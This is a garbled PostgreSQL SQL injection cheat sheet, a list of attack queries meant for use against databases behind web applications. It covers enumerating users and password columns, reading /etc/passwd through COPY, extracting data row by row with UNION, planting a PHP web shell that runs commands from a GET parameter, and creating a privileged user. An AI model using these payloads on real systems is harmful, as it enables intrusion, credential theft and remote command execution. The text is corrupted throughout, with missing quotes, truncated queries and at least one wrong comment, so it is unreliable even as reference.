Postgres SQL Injection Cheat Sheet

SELECT/* comment */1;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername ();






T where (C. relkind = r) AND (N. oid = C. relnamespace) AND (A. attrelid = C. oid)
AND (A. atttypid = T. oid) AND (A. attnum> 0) AND (not a. attisdropped) AND (N. nspname ILIKE public)
ON n. oid = c. relnamespace WHERE c. relkind IN (r,) AND n. nspname
Not in (pg_catalog, pg_toast) AND pg_catalog.pg_table_is_visible (c. oid)
T where (C. relkind = r) AND (N. oid = C. relnamespace) AND (A. attrelid = C. oid)
AND (A. atttypid = T. oid) AND (A. attnum> 0) AND (not a. attisdropped) AND
(N. nspname ILIKE public) AND attname LIKE % password %;
SELECT usename FROM pg_user order by usename LIMIT 1 OFFSET 1;

SELECT 6 & 1; -- returns 0


Select cast (1 as int );





Contrib/dblink is installed (it isnt by default)
It can be used to resolve hostnames (assuming you have DBA rights ):

COPY mydata FROM/etc/passwd; -- priv, can read files which are readable by s OS-level user
... Union all select t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
... Union all select t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time...
Drop table mytest;
Insert into mytable (mycol) VALUES (<? Pasthru ($ _ GET [cmd]) ;?> );
COPY mytable (mycol) TO/tmp/test. php; -- priv, write files as your s OS-level user. generally you wont be able to write to the web root, but its always work a try.
SELECT inet_server_port (); -- returns db server IP address (or null if using local connection)
Create user test1 PASSWORD pass1 CREATEUSER; -- priv, grant some privs at the same time


SELECT current_setting (pai_file); -- priv